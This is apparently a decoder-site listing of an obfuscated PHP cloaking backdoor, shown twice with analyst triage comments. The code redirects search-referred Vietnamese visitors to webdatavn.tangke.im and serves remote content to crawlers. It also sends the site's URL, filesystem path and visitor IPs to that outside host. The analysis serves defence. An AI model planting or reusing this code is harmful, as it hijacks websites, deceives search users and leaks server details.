PHP Decode
<?php goto ; : function getMiddleText($text, $startTag, $endTag) { goto ; : ${call_user..
Decoded Output
<?php
/*
 * Analyst notes for triage. Names used below are the hex-decoded values of the
 * hex2bin(...) and pack("H<n>", ...) literals in this listing.
 *
 * Reading caveat: every goto target and every label name is blank here ("goto ; :"),
 * so the listing does not parse as PHP and the order in which statements appear is
 * not the order in which they would run. The summary is assembled from individual
 * statements; sequencing and branch assignment are inferred, not shown.
 *
 * What the visible statements do:
 *  - Setup: set_time_limit(3600), a text/html Content-Type header, ob_start(), and the
 *    timezone set to America/Toronto. $c14 holds "https://webdatavn.tangke.im/".
 *  - Visitor fingerprinting from request headers: $useragent is the lower-cased
 *    User-Agent, $referer is the host part of the Referer. getVisitorIP() and D63()
 *    both pick an address from HTTP_CLIENT_IP, HTTP_X_FORWARDED_FOR or REMOTE_ADDR;
 *    the first two are client-supplied headers.
 *  - Referer gate: when $referer is in $googleDomains (www.google.com,
 *    www.google.com.vn), a cURL request with CURLOPT_SSL_VERIFYPEER disabled goes to
 *    https://pro.ip-api.com/json/<visitor ip> with a hex-encoded "?key=" parameter.
 *    getMiddleText() cuts the countryCode value out of the response, and a comparison
 *    with "VN" gates a Location header to $targetUrl
 *    ("https://webdatavn.tangke.im/vn3.html") followed by exit.
 *  - User-Agent gate: a strpos() test for "googlebot" gates a call to D31($c14, $Cdd)
 *    and an exit; which branch holds which statement cannot be read from this listing.
 *  - D31() assembles "request_url=", "www_path=", "client_ip=", "request_php=" and
 *    "request_type=" from $_SERVER values (host, URI, script path, document root) and
 *    passes them to $c14 through f1A(). With a crawler-like User-Agent it requests
 *    "?redirect=0&..." and prints the response via die(). With a search-engine Referer
 *    it requests "?redirect=1&..."; a response starting with http:// or https:// is
 *    used as a Location header, anything else is printed via die().
 *  - f1A($Eb9) fetches a URL with file_get_contents() when allow_url_fopen is on,
 *    otherwise with cURL following redirects and with CURLOPT_SSL_VERIFYHOST and
 *    CURLOPT_SSL_VERIFYPEER disabled. It is called as F1A(); PHP function names are
 *    case-insensitive.
 *
 * Net effect, as far as the statements show: search-engine crawlers and visitors
 * arriving from search results receive remotely supplied content or a redirect, and
 * the host's URL, filesystem path and visitor address are sent to the remote endpoint.
 * NOTE(review): what other visitors receive depends on code outside this listing.
 *
 * Where to look on an affected host:
 *  - Outbound HTTPS from the web server to webdatavn.tangke.im and pro.ip-api.com.
 *  - Responses for the same URL that differ by User-Agent or Referer.
 *  - PHP files using ${call_user_func(function () { return hex2bin("..."); })} as
 *    variable names together with dense goto chains.
 *  - Leading @ on set_time_limit, ob_start and ini_get, which suppresses error output.
 */
goto ; : function getMiddleText($text, $startTag, $endTag) { goto ; : ${call_user_func(function () { return hex2bin("656e64496e646578"); })} = strpos(${call_user_func(function () { return hex2bin("74657874"); })}, ${call_user_func(function () { return hex2bin("656e64546167"); })}, ${call_user_func(function () { return hex2bin("7374617274496e646578"); })}); goto ; : return substr(${call_user_func(function () { return hex2bin("74657874"); })}, ${call_user_func(function () { return hex2bin("7374617274496e646578"); })}, ${call_user_func(function () { return hex2bin("656e64496e646578"); })} - ${call_user_func(function () { return hex2bin("7374617274496e646578"); })}); goto ; : ${call_user_func(function () { return hex2bin("7374617274496e646578"); })} = strpos(${call_user_func(function () { return hex2bin("74657874"); })}, ${call_user_func(function () { $X = pack("H16", "7374617274546167"); return $X; })}) + strlen(${call_user_func(function () { return hex2bin("7374617274546167"); })}); goto ; : } goto ; : : goto ; : : goto ; : @set_time_limit(3600); goto ; : : goto ; : header("Content-Type:text/html;charset=utf-8"); goto ; : ${call_user_func(function () { return hex2bin("633134"); })} = "https://webdatavn.tangke.im/"; goto ; : function D63() { goto ; : : goto ; : : goto ; : : goto ; : return ${call_user_func(function () { $X = pack("H6", "656464"); return $X; })}; goto ; : switch (isset($_SERVER["HTTP_CLIENT_IP"]) && strcasecmp($_SERVER["HTTP_CLIENT_IP"], "unknown")) { case false: goto ; : if (isset($_SERVER["REMOTE_ADDR"]) && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { goto ; } goto ; : ${call_user_func(function () { $X = pack("H6", "656464"); return $X; })} = $_SERVER["REMOTE_ADDR"]; goto ; : ${call_user_func(function () { return hex2bin("656464"); })} = "unknown"; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("656464"); })} = $_SERVER["REMOTE_ADDR"]; goto ; : goto ; goto ; : : goto ; : if (isset($_SERVER["REMOTE_ADDR"]) && 
$_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { goto ; } goto ; : goto ; goto ; : : goto ; : goto ; goto ; : : goto ; : goto ; goto ; : if (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")) { goto ; } goto ; : : goto ; : ${call_user_func(function () { $X = pack("H6", "656464"); return $X; })} = $_SERVER["HTTP_X_FORWARDED_FOR"]; goto ; : : goto ; : case true: ${call_user_func(function () { return hex2bin("656464"); })} = $_SERVER["HTTP_CLIENT_IP"]; goto ; } goto ; : } goto ; : switch (in_array(${call_user_func(function () { return hex2bin("72656665726572"); })}, ${call_user_func(function () { return hex2bin("676f6f676c65446f6d61696e73"); })})) { case false: goto ; case true: goto ; : ${call_user_func(function () { $X = pack("H12", "697054657874"); return $X; })} = getMiddleText(${call_user_func(function () { return hex2bin("64617461"); })}, call_user_func(function () { return hex2bin("636f756e747279436f6465223a22"); }), call_user_func(function () { return hex2bin("22"); })); goto ; : ${call_user_func(function () { return hex2bin("75726c"); })} = call_user_func(function () { return hex2bin("68747470733a2f2f70726f2e69702d6170692e636f6d2f6a736f6e2f"); }) . getVisitorIP() . call_user_func(function () { return hex2bin("3f6b65793d3047627a77566d4173614c5a34486d"); }); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("6375726c"); })}, CURLOPT_SSL_VERIFYPEER, false); goto ; : : goto ; : curl_setopt(${call_user_func(function () { return hex2bin("6375726c"); })}, CURLOPT_URL, ${call_user_func(function () { $X = pack("H6", "75726c"); return $X; })}); goto ; : goto ; goto ; : switch (${call_user_func(function () { $X = pack("H12", "697054657874"); return $X; })} == call_user_func(function () { return hex2bin("564e"); })) { case false: goto ; case true: goto ; : header("Location: " . 
${call_user_func(function () { return hex2bin("74617267657455726c"); })}); goto ; : goto ; goto ; : exit; goto ; : ${call_user_func(function () { return hex2bin("74617267657455726c"); })} = "https://webdatavn.tangke.im/vn3.html"; goto ; : } goto ; : curl_setopt(${call_user_func(function () { return hex2bin("6375726c"); })}, CURLOPT_RETURNTRANSFER, 1); goto ; : : goto ; : curl_close(${call_user_func(function () { $X = pack("H8", "6375726c"); return $X; })}); goto ; : ${call_user_func(function () { return hex2bin("6375726c"); })} = curl_init(); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("64617461"); })} = curl_exec(${call_user_func(function () { return hex2bin("6375726c"); })}); goto ; : curl_setopt(${call_user_func(function () { $X = pack("H8", "6375726c"); return $X; })}, CURLOPT_HEADER, 1); goto ; : } goto ; : : goto ; : ${call_user_func(function () { $X = pack("H18", "757365726167656e74"); return $X; })} = strtolower($_SERVER[call_user_func(function () { $X = pack("H30", "485454505f555345525f4147454e54"); return $X; })]); goto ; : : goto ; : switch (strpos(${call_user_func(function () { $X = pack("H18", "757365726167656e74"); return $X; })}, call_user_func(function () { $X = pack("H18", "676f6f676c65626f74"); return $X; })) !== false) { case false: goto ; case true: goto ; : exit; goto ; : D31(${call_user_func(function () { return hex2bin("633134"); })}, ${call_user_func(function () { return hex2bin("436464"); })}); goto ; : goto ; goto ; : } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("436464"); })} = ''; goto ; : function getVisitorIP() { goto ; : return ${call_user_func(function () { return hex2bin("6970"); })}; goto ; : : goto ; : goto ; goto ; : : goto ; : if (!empty($_SERVER[call_user_func(function () { return hex2bin("485454505f585f464f525741524445445f464f52"); })])) { goto ; } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("6970"); })} = $_SERVER[call_user_func(function () { return 
hex2bin("52454d4f54455f41444452"); })]; goto ; : if (!empty($_SERVER[call_user_func(function () { $X = pack("H28", "485454505f434c49454e545f4950"); return $X; })])) { goto ; } goto ; : ${call_user_func(function () { return hex2bin("6970"); })} = $_SERVER[call_user_func(function () { return hex2bin("485454505f585f464f525741524445445f464f52"); })]; goto ; : goto ; goto ; : ${call_user_func(function () { return hex2bin("6970"); })} = $_SERVER[call_user_func(function () { $X = pack("H28", "485454505f434c49454e545f4950"); return $X; })]; goto ; : } goto ; : function f1A($Eb9) { goto ; : : goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_SSL_VERIFYHOST, 0); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_FOLLOWLOCATION, 1); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_RETURNTRANSFER, 1); goto ; : curl_setopt(${call_user_func(function () { $X = pack("H6", "613435"); return $X; })}, CURLOPT_URL, ${call_user_func(function () { return hex2bin("456239"); })}); goto ; : curl_close(${call_user_func(function () { return hex2bin("613435"); })}); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_SSL_VERIFYPEER, false); goto ; : switch (@ini_get("allow_url_fopen")) { case false: goto ; case true: return file_get_contents(${call_user_func(function () { $X = pack("H6", "456239"); return $X; })}); goto ; } goto ; : return ${call_user_func(function () { return hex2bin("653238"); })}; goto ; : ${call_user_func(function () { return hex2bin("613435"); })} = curl_init(); goto ; : ${call_user_func(function () { return hex2bin("653238"); })} = curl_exec(${call_user_func(function () { return hex2bin("613435"); })}); goto ; : : goto ; : : goto ; : } goto ; : : goto ; : : goto ; : : goto ; : @ob_start(); goto ; : switch (version_compare(PHP_VERSION, "5.1.0", "<")) { case false: @date_default_timezone_set("America/Toronto"); 
goto ; case true: @ini_set("date.timezone", "America/Toronto"); goto ; } goto ; : ${call_user_func(function () { $X = pack("H26", "676f6f676c65446f6d61696e73"); return $X; })} = [call_user_func(function () { return hex2bin("7777772e676f6f676c652e636f6d"); }), call_user_func(function () { $X = pack("H34", "7777772e676f6f676c652e636f6d2e766e"); return $X; })]; goto ; : ${call_user_func(function () { $X = pack("H14", "72656665726572"); return $X; })} = parse_url($_SERVER[call_user_func(function () { $X = pack("H24", "485454505f52454645524552"); return $X; })], PHP_URL_HOST); goto ; : function D31($c14, $Cdd = '') { goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = strtolower(${call_user_func(function () { return hex2bin("413939"); })}) == "index.php" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("413939"); })}; goto ; : ${call_user_func(function () { $X = pack("H6", "466334"); return $X; })} = preg_replace("/\/$/si", call_user_func(function () { return hex2bin(''); }), ${call_user_func(function () { return hex2bin("466334"); })}); goto ; : switch (isset($_SERVER["HTTP_REFERER"]) && preg_match("/(google|yahoo|yandex|bing|baidu|aol|ask|excite|duckduckgo)/si", $_SERVER["HTTP_REFERER"])) { case false: goto ; case true: goto ; : ${call_user_func(function () { return hex2bin("426466"); })} = F1A("{${call_user_func(function () { return hex2bin("633134"); })}}?redirect=1&{${call_user_func(function () { return hex2bin("433139"); })}}"); goto ; : : goto ; : goto ; goto ; : : goto ; : switch (preg_match("/^https?\:\/\//si", ${call_user_func(function () { return hex2bin("426466"); })})) { case false: die(${call_user_func(function () { return hex2bin("426466"); })}); goto ; case true: goto ; : goto ; goto ; : header("Location:" . 
${call_user_func(function () { $X = pack("H6", "426466"); return $X; })}); goto ; : exit; goto ; : } goto ; : : goto ; : } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("433230"); })} = ${call_user_func(function () { return hex2bin("433230"); })} == call_user_func(function () { $X = pack("H0", ''); return $X; }) ? isset($_SERVER["PATH_INFO"]) && $_SERVER["PATH_INFO"] != call_user_func(function () { return hex2bin(''); }) ? $_SERVER["PATH_INFO"] : ${call_user_func(function () { return hex2bin("433230"); })} : ${call_user_func(function () { return hex2bin("433230"); })}; goto ; : ${call_user_func(function () { return hex2bin("443033"); })} = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http") . "://" . ${call_user_func(function () { return hex2bin("443033"); })}; goto ; : ${call_user_func(function () { $X = pack("H6", "413939"); return $X; })} = isset($_SERVER["SCRIPT_NAME"]) ? $_SERVER["SCRIPT_NAME"] : str_replace(${call_user_func(function () { return hex2bin("466334"); })}, call_user_func(function () { return hex2bin(''); }), ${call_user_func(function () { return hex2bin("436636"); })}); goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = preg_replace("/.*\/(.*)/si", "$1", ${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}); goto ; : ${call_user_func(function () { return hex2bin("443033"); })} = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"]; goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = str_replace("\", "/", ${call_user_func(function () { return hex2bin("436636"); })} == call_user_func(function () { return hex2bin(''); }) || ${call_user_func(function () { return hex2bin("436636"); })} == "index.php" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("436636"); })}); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("433139"); })} = "request_url=" . 
urlencode("{${call_user_func(function () { return hex2bin("443033"); })}}{${call_user_func(function () { return hex2bin("433230"); })}}") . "&www_path=" . urlencode(${call_user_func(function () { $X = pack("H6", "436636"); return $X; })}) . "&client_ip=" . urlencode(D63()) . "&request_php=" . urlencode(${call_user_func(function () { return hex2bin("413939"); })}) . "&request_type=" . urlencode(${call_user_func(function () { return hex2bin("436464"); })}); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = ${call_user_func(function () { return hex2bin("413939"); })} != call_user_func(function () { return hex2bin(''); }) ? substr(${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}, 0, strrpos(${call_user_func(function () { return hex2bin("413939"); })}, "/")) : (${call_user_func(function () { return hex2bin("466334"); })} != call_user_func(function () { return hex2bin(''); }) ? str_replace(${call_user_func(function () { $X = pack("H6", "466334"); return $X; })}, call_user_func(function () { return hex2bin(''); }), dirname(${call_user_func(function () { return hex2bin("436636"); })})) : call_user_func(function () { return hex2bin(''); })); goto ; : ${call_user_func(function () { return hex2bin("466334"); })} = isset($_SERVER["DOCUMENT_ROOT"]) ? str_replace("\", "/", $_SERVER["DOCUMENT_ROOT"]) : call_user_func(function () { return hex2bin(''); }); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("433230"); })} = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : (isset($_SERVER["QUERY_STRING"]) ? 
$_SERVER["QUERY_STRING"] : call_user_func(function () { return hex2bin(''); })); goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = ${call_user_func(function () { return hex2bin("413939"); })} != call_user_func(function () { return hex2bin(''); }) ? substr(${call_user_func(function () { return hex2bin("413939"); })}, 1) : ${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = strtolower(${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}) == "index.php" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("413939"); })}; goto ; : switch (isset($_SERVER["HTTP_USER_AGENT"]) && preg_match("/(googlebot|yahoo|slurp|baiduspider|bingbot|google|baidu|aol|bing)/si", $_SERVER["HTTP_USER_AGENT"])) { case false: goto ; case true: die(F1A("{${call_user_func(function () { return hex2bin("633134"); })}}?redirect=0&{${call_user_func(function () { return hex2bin("433139"); })}}")); goto ; } goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = str_replace("\", "/", ${call_user_func(function () { return hex2bin("436636"); })}); goto ; : } ?>
Original Code
<?php
/*
 * Reading aid for the obfuscation in this sample.
 *
 * Every variable is written as ${call_user_func(function () { return hex2bin("<hex>"); })}
 * or the equivalent pack("H<n>", "<hex>") form: the closure returns a string and PHP's
 * variable-variable syntax uses that string as the variable name. Several string
 * constants are wrapped in the same closures. hex2bin('') and pack("H0", '') are the
 * empty string.
 *
 * As rendered here all goto targets and label names are blank ("goto ; :"), so the
 * listing is not valid PHP and the textual order of statements does not show execution
 * order. The "\" arguments to str_replace() also appear with their escaping lost.
 *
 * Decoded variable names, by scope:
 *   getMiddleText: text, startTag, endTag, startIndex, endIndex
 *   top level:     c14, Cdd, googleDomains, referer, useragent, url, curl, data,
 *                  ipText, targetUrl
 *   getVisitorIP:  ip
 *   D63:           edd
 *   f1A:           Eb9, a45 (cURL handle), e28 (curl_exec result)
 *   D31:           A99, Fc4, Bdf, C19, C20, D03, Cf6
 *
 * Decoded string constants:
 *   $_SERVER keys:  HTTP_USER_AGENT, HTTP_REFERER, HTTP_X_FORWARDED_FOR,
 *                   HTTP_CLIENT_IP, REMOTE_ADDR
 *   match values:   googlebot, www.google.com, www.google.com.vn, VN
 *   lookup URL:     https://pro.ip-api.com/json/ followed by the visitor address and
 *                   a "?key=" parameter (value left encoded in these notes)
 *   parse markers:  countryCode":" and a closing double quote, the start and end tags
 *                   handed to getMiddleText()
 *
 * Strings left in clear text: "https://webdatavn.tangke.im/",
 * "https://webdatavn.tangke.im/vn3.html", the crawler and search-engine regexes, and
 * the query-string field names request_url, www_path, client_ip, request_php,
 * request_type.
 */
goto ; : function getMiddleText($text, $startTag, $endTag) { goto ; : ${call_user_func(function () { return hex2bin("656e64496e646578"); })} = strpos(${call_user_func(function () { return hex2bin("74657874"); })}, ${call_user_func(function () { return hex2bin("656e64546167"); })}, ${call_user_func(function () { return hex2bin("7374617274496e646578"); })}); goto ; : return substr(${call_user_func(function () { return hex2bin("74657874"); })}, ${call_user_func(function () { return hex2bin("7374617274496e646578"); })}, ${call_user_func(function () { return hex2bin("656e64496e646578"); })} - ${call_user_func(function () { return hex2bin("7374617274496e646578"); })}); goto ; : ${call_user_func(function () { return hex2bin("7374617274496e646578"); })} = strpos(${call_user_func(function () { return hex2bin("74657874"); })}, ${call_user_func(function () { $X = pack("H16", "7374617274546167"); return $X; })}) + strlen(${call_user_func(function () { return hex2bin("7374617274546167"); })}); goto ; : } goto ; : : goto ; : : goto ; : @set_time_limit(3600); goto ; : : goto ; : header("Content-Type:text/html;charset=utf-8"); goto ; : ${call_user_func(function () { return hex2bin("633134"); })} = "https://webdatavn.tangke.im/"; goto ; : function D63() { goto ; : : goto ; : : goto ; : : goto ; : return ${call_user_func(function () { $X = pack("H6", "656464"); return $X; })}; goto ; : switch (isset($_SERVER["HTTP_CLIENT_IP"]) && strcasecmp($_SERVER["HTTP_CLIENT_IP"], "unknown")) { case false: goto ; : if (isset($_SERVER["REMOTE_ADDR"]) && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { goto ; } goto ; : ${call_user_func(function () { $X = pack("H6", "656464"); return $X; })} = $_SERVER["REMOTE_ADDR"]; goto ; : ${call_user_func(function () { return hex2bin("656464"); })} = "unknown"; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("656464"); })} = $_SERVER["REMOTE_ADDR"]; goto ; : goto ; goto ; : : goto ; : if (isset($_SERVER["REMOTE_ADDR"]) && 
$_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { goto ; } goto ; : goto ; goto ; : : goto ; : goto ; goto ; : : goto ; : goto ; goto ; : if (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")) { goto ; } goto ; : : goto ; : ${call_user_func(function () { $X = pack("H6", "656464"); return $X; })} = $_SERVER["HTTP_X_FORWARDED_FOR"]; goto ; : : goto ; : case true: ${call_user_func(function () { return hex2bin("656464"); })} = $_SERVER["HTTP_CLIENT_IP"]; goto ; } goto ; : } goto ; : switch (in_array(${call_user_func(function () { return hex2bin("72656665726572"); })}, ${call_user_func(function () { return hex2bin("676f6f676c65446f6d61696e73"); })})) { case false: goto ; case true: goto ; : ${call_user_func(function () { $X = pack("H12", "697054657874"); return $X; })} = getMiddleText(${call_user_func(function () { return hex2bin("64617461"); })}, call_user_func(function () { return hex2bin("636f756e747279436f6465223a22"); }), call_user_func(function () { return hex2bin("22"); })); goto ; : ${call_user_func(function () { return hex2bin("75726c"); })} = call_user_func(function () { return hex2bin("68747470733a2f2f70726f2e69702d6170692e636f6d2f6a736f6e2f"); }) . getVisitorIP() . call_user_func(function () { return hex2bin("3f6b65793d3047627a77566d4173614c5a34486d"); }); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("6375726c"); })}, CURLOPT_SSL_VERIFYPEER, false); goto ; : : goto ; : curl_setopt(${call_user_func(function () { return hex2bin("6375726c"); })}, CURLOPT_URL, ${call_user_func(function () { $X = pack("H6", "75726c"); return $X; })}); goto ; : goto ; goto ; : switch (${call_user_func(function () { $X = pack("H12", "697054657874"); return $X; })} == call_user_func(function () { return hex2bin("564e"); })) { case false: goto ; case true: goto ; : header("Location: " . 
${call_user_func(function () { return hex2bin("74617267657455726c"); })}); goto ; : goto ; goto ; : exit; goto ; : ${call_user_func(function () { return hex2bin("74617267657455726c"); })} = "https://webdatavn.tangke.im/vn3.html"; goto ; : } goto ; : curl_setopt(${call_user_func(function () { return hex2bin("6375726c"); })}, CURLOPT_RETURNTRANSFER, 1); goto ; : : goto ; : curl_close(${call_user_func(function () { $X = pack("H8", "6375726c"); return $X; })}); goto ; : ${call_user_func(function () { return hex2bin("6375726c"); })} = curl_init(); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("64617461"); })} = curl_exec(${call_user_func(function () { return hex2bin("6375726c"); })}); goto ; : curl_setopt(${call_user_func(function () { $X = pack("H8", "6375726c"); return $X; })}, CURLOPT_HEADER, 1); goto ; : } goto ; : : goto ; : ${call_user_func(function () { $X = pack("H18", "757365726167656e74"); return $X; })} = strtolower($_SERVER[call_user_func(function () { $X = pack("H30", "485454505f555345525f4147454e54"); return $X; })]); goto ; : : goto ; : switch (strpos(${call_user_func(function () { $X = pack("H18", "757365726167656e74"); return $X; })}, call_user_func(function () { $X = pack("H18", "676f6f676c65626f74"); return $X; })) !== false) { case false: goto ; case true: goto ; : exit; goto ; : D31(${call_user_func(function () { return hex2bin("633134"); })}, ${call_user_func(function () { return hex2bin("436464"); })}); goto ; : goto ; goto ; : } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("436464"); })} = ''; goto ; : function getVisitorIP() { goto ; : return ${call_user_func(function () { return hex2bin("6970"); })}; goto ; : : goto ; : goto ; goto ; : : goto ; : if (!empty($_SERVER[call_user_func(function () { return hex2bin("485454505f585f464f525741524445445f464f52"); })])) { goto ; } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("6970"); })} = $_SERVER[call_user_func(function () { return 
hex2bin("52454d4f54455f41444452"); })]; goto ; : if (!empty($_SERVER[call_user_func(function () { $X = pack("H28", "485454505f434c49454e545f4950"); return $X; })])) { goto ; } goto ; : ${call_user_func(function () { return hex2bin("6970"); })} = $_SERVER[call_user_func(function () { return hex2bin("485454505f585f464f525741524445445f464f52"); })]; goto ; : goto ; goto ; : ${call_user_func(function () { return hex2bin("6970"); })} = $_SERVER[call_user_func(function () { $X = pack("H28", "485454505f434c49454e545f4950"); return $X; })]; goto ; : } goto ; : function f1A($Eb9) { goto ; : : goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_SSL_VERIFYHOST, 0); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_FOLLOWLOCATION, 1); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_RETURNTRANSFER, 1); goto ; : curl_setopt(${call_user_func(function () { $X = pack("H6", "613435"); return $X; })}, CURLOPT_URL, ${call_user_func(function () { return hex2bin("456239"); })}); goto ; : curl_close(${call_user_func(function () { return hex2bin("613435"); })}); goto ; : curl_setopt(${call_user_func(function () { return hex2bin("613435"); })}, CURLOPT_SSL_VERIFYPEER, false); goto ; : switch (@ini_get("allow_url_fopen")) { case false: goto ; case true: return file_get_contents(${call_user_func(function () { $X = pack("H6", "456239"); return $X; })}); goto ; } goto ; : return ${call_user_func(function () { return hex2bin("653238"); })}; goto ; : ${call_user_func(function () { return hex2bin("613435"); })} = curl_init(); goto ; : ${call_user_func(function () { return hex2bin("653238"); })} = curl_exec(${call_user_func(function () { return hex2bin("613435"); })}); goto ; : : goto ; : : goto ; : } goto ; : : goto ; : : goto ; : : goto ; : @ob_start(); goto ; : switch (version_compare(PHP_VERSION, "5.1.0", "<")) { case false: @date_default_timezone_set("America/Toronto"); 
goto ; case true: @ini_set("date.timezone", "America/Toronto"); goto ; } goto ; : ${call_user_func(function () { $X = pack("H26", "676f6f676c65446f6d61696e73"); return $X; })} = [call_user_func(function () { return hex2bin("7777772e676f6f676c652e636f6d"); }), call_user_func(function () { $X = pack("H34", "7777772e676f6f676c652e636f6d2e766e"); return $X; })]; goto ; : ${call_user_func(function () { $X = pack("H14", "72656665726572"); return $X; })} = parse_url($_SERVER[call_user_func(function () { $X = pack("H24", "485454505f52454645524552"); return $X; })], PHP_URL_HOST); goto ; : function D31($c14, $Cdd = '') { goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = strtolower(${call_user_func(function () { return hex2bin("413939"); })}) == "index.php" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("413939"); })}; goto ; : ${call_user_func(function () { $X = pack("H6", "466334"); return $X; })} = preg_replace("/\/$/si", call_user_func(function () { return hex2bin(''); }), ${call_user_func(function () { return hex2bin("466334"); })}); goto ; : switch (isset($_SERVER["HTTP_REFERER"]) && preg_match("/(google|yahoo|yandex|bing|baidu|aol|ask|excite|duckduckgo)/si", $_SERVER["HTTP_REFERER"])) { case false: goto ; case true: goto ; : ${call_user_func(function () { return hex2bin("426466"); })} = F1A("{${call_user_func(function () { return hex2bin("633134"); })}}?redirect=1&{${call_user_func(function () { return hex2bin("433139"); })}}"); goto ; : : goto ; : goto ; goto ; : : goto ; : switch (preg_match("/^https?\:\/\//si", ${call_user_func(function () { return hex2bin("426466"); })})) { case false: die(${call_user_func(function () { return hex2bin("426466"); })}); goto ; case true: goto ; : goto ; goto ; : header("Location:" . 
${call_user_func(function () { $X = pack("H6", "426466"); return $X; })}); goto ; : exit; goto ; : } goto ; : : goto ; : } goto ; : : goto ; : ${call_user_func(function () { return hex2bin("433230"); })} = ${call_user_func(function () { return hex2bin("433230"); })} == call_user_func(function () { $X = pack("H0", ''); return $X; }) ? isset($_SERVER["PATH_INFO"]) && $_SERVER["PATH_INFO"] != call_user_func(function () { return hex2bin(''); }) ? $_SERVER["PATH_INFO"] : ${call_user_func(function () { return hex2bin("433230"); })} : ${call_user_func(function () { return hex2bin("433230"); })}; goto ; : ${call_user_func(function () { return hex2bin("443033"); })} = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http") . "://" . ${call_user_func(function () { return hex2bin("443033"); })}; goto ; : ${call_user_func(function () { $X = pack("H6", "413939"); return $X; })} = isset($_SERVER["SCRIPT_NAME"]) ? $_SERVER["SCRIPT_NAME"] : str_replace(${call_user_func(function () { return hex2bin("466334"); })}, call_user_func(function () { return hex2bin(''); }), ${call_user_func(function () { return hex2bin("436636"); })}); goto ; : ${call_user_func(function () { return hex2bin("413939"); })} = preg_replace("/.*\/(.*)/si", "$1", ${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}); goto ; : ${call_user_func(function () { return hex2bin("443033"); })} = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"]; goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = str_replace("\", "/", ${call_user_func(function () { return hex2bin("436636"); })} == call_user_func(function () { return hex2bin(''); }) || ${call_user_func(function () { return hex2bin("436636"); })} == "index.php" ? call_user_func(function () { return hex2bin(''); }) : ${call_user_func(function () { return hex2bin("436636"); })}); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("433139"); })} = "request_url=" . 
urlencode("{${call_user_func(function () { return hex2bin("443033"); })}}{${call_user_func(function () { return hex2bin("433230"); })}}") . "&www_path=" . urlencode(${call_user_func(function () { $X = pack("H6", "436636"); return $X; })}) . "&client_ip=" . urlencode(D63()) . "&request_php=" . urlencode(${call_user_func(function () { return hex2bin("413939"); })}) . "&request_type=" . urlencode(${call_user_func(function () { return hex2bin("436464"); })}); goto ; : : goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__; goto ; : : goto ; : ${call_user_func(function () { return hex2bin("436636"); })} = ${call_user_func(function () { return hex2bin("413939"); })} != call_user_func(function () { return hex2bin(''); }) ? substr(${call_user_func(function () { $X = pack("H6", "413939"); return $X; })}, 0, strrpos(${call_user_func(function () { return hex2bin("413939"); })}, "/")) : (${call_user_func(function () { return hex2bin("466334"); })} != call_user_func(function () { return hex2bin(''); }) ? str_replace(${call_user_func(function () { $X = pack("H6", "466334"); return $X; })}, call_user_func(function () { return hex2bin(''); }), dirname(${call_user_func(function () { return hex2bin("436636"); })})) : call_user_func(function () { return hex2bin(''); })); goto ; : ${call_user_func(function () { return hex2bin("466334"); })} = isset($_SERVER["DOCUMENT_ROOT"]) ? str_replace("\", "/", $_SERVER["DOCUMENT_ROOT"]) : call_user_func(function () { return hex2bin(''); }); goto ; : 